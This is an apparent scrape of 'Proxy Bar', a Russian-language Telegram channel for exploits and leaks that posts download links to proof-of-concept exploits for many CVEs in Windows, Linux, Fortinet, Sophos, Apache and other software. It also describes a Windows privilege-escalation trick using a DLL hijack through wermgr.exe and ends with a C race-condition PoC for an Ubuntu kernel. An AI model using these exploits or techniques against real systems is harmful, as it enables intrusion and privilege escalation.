Proxy Bar
21.4K subscribers
1.73K photos
107 videos
669 files
1.78K links
Exploits, Hacking and Leaks

Чат группы - https://xn--r1a.website/

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
CVE-2022-24342
JetBrains TeamCity - account takeover via CSRF in GitHub authentication (PoC exploit)
Смотреть немое кино тут

#cve #poc
Про шифрование на mega.nz наверно все уже слышали да ?
Уже и mitm RSA key recovery POC гуляет
Вот на почитать - как оно устроенно:
1. Malleable Encryption Goes Awry
2. RSA Key Recovery Attack
3. MEGA attack explainer
Вот на посмотреть
1. RSA key attack

#mega #rsa #poc
😱9👍4
WSO_2_RCE
CVE-2022-29464
POC exploit

#exploit #poc
👍11🔥4
CVE-2022-34918-LPE.zip
15.2 KB
CVE-2022-34918
A crack in the Linux firewall
Разбор и аналитика тут


#linux #poc #exploit #lpe
👍4😱3
TOP All bugbounty pentesting CVE-2022- POC Exp Things
Link
😝
#exploit #poc
👍1
CVE-2022-42889
Почитать про дырку тут
Сканер дырки на питоне text4shell-tools
Сканер дырки для BurpSuite burp-text4shell
Поиграться с дыркой в докере text4shell-docker
Сам POC

#apache #exploit #poc
🔥10
cve-2022-3602
cve-2022-3786 - openssl-poc
Download POC

#openssl #poc
👍8🔥2
концепция удаления/записи произвольного файла в Sysmon (CVE-2022-41120/CVE-2022-XXXXX)
download POC

#windows #LPE #poc
😱4👍2🔥2
DirCreate2System
Получаем NT AUTHORITY\\SYSTEM
*
Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.
*
DOWNLOAD POC

#windows #escpriv #POC #system
👍5
CVE-2022-42046 Наконец то опубликовали
local privilege escalation
POC download

#windows #lpe #poc
🔥5👍3
CVE-2023-23924 библиотека Dompdf - RCE
CVSS score: 10 !!!
Конкретнее о дырке тут

#php #vuln #poc
🔥11👍1
CVE-2022-44666
WriteUp по одной забытой уязвимости Windows (0day): выход атрибута href управления системной ссылкой Microsoft Windows Contacts (VCF/Contact/LDAP), который не был полностью исправлен как CVE-2022-44666 в исправлениях, выпущенных в декабре 2022 года. А значит, жир еще впереди.
POC в наличии
Go

#win #poc #vuln
😱4👍3🔥3
CVE-2022-39952 Fortinet FortiNAC
CVSS score of 9.8

Продукты, затронутые уязвимостью:
FortiNAC version 9.4.0
FortiNAC version 9.2.0 through 9.2.5
FortiNAC version 9.1.0 through 9.1.7
FortiNAC 8.8 all versions
FortiNAC 8.7 all versions
FortiNAC 8.6 all versions
FortiNAC 8.5 all versions, and
FortiNAC 8.3 all versions

POC exploit

#forti #poc
👍13🔥3😱3
CVE-2023-1671
Pre-Auth RCE in Sophos Web Appliance
CVSS score of 9.8
POC

#poc #sophos
🔥6
CVE-2023-27524
Apache Superset Auth Bypass
POC exploit

день бога я смотрю

#apache #poc
🔥8
image_2023-05-19_14-09-33.png
8.3 KB
CVE-2023-21554
win message подъехали
POC

#win #poc
👍8🔥1
CVE-2024-21345 Windows Kernel EoP
*
WriteUp
*
exploit

#win #poc
🔥13👍5
CVE-2024-28397 js2py
sandbox escape, bypass pyimport restriction
*
POC + fix

#python #js #poc
🔥7😱2
CVE-2024-28955 Automated Path Traversal & Local File Read
*
POC exploit

#poc #path
🔥15👍1
Ubuntu 25.04 (ядро 6.14.11)
минимальный POC
What ?

#define _GNU_SOURCE
#include <sys/mman.h>
#include <fcntl.h>
#include <stdio.h>
#include <linux/falloc.h>
#include <err.h>
#include <pthread.h>

#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})

#define FALLOC_LEN 64 * 1024 * 1024 // Max on Ubuntu 25.04

pthread_barrier_t barrier;
int ffd;
char *fmap;

void hole_punch() {
SYSCHK(ffd = open("/dev/shm/", O_TMPFILE | O_RDWR, 0666));
SYSCHK(fallocate(ffd, 0, 0, FALLOC_LEN));
SYSCHK(fmap = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, ffd, 0));

pthread_barrier_wait(&barrier); // barrier 1
SYSCHK(fallocate(ffd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE, 0, FALLOC_LEN));
}

int main(void) {
pthread_barrier_init(&barrier, NULL, 2);

pthread_t hole_punch_thread;
SYSCHK(pthread_create(&hole_punch_thread, NULL, (void*)hole_punch, NULL));

struct timespec start, end;
pthread_barrier_wait(&barrier); // barrier 1

clock_gettime(CLOCK_MONOTONIC, &start);
volatile char dummy = *(char *)fmap; // Simulated kernel access during hole punch
clock_gettime(CLOCK_MONOTONIC, &end);

long long stall_ns = (end.tv_sec - start.tv_sec) * 1000000000LL + (end.tv_nsec - start.tv_nsec);

printf("Stall time: %lld ns\n", stall_ns);
}
🔥21😱8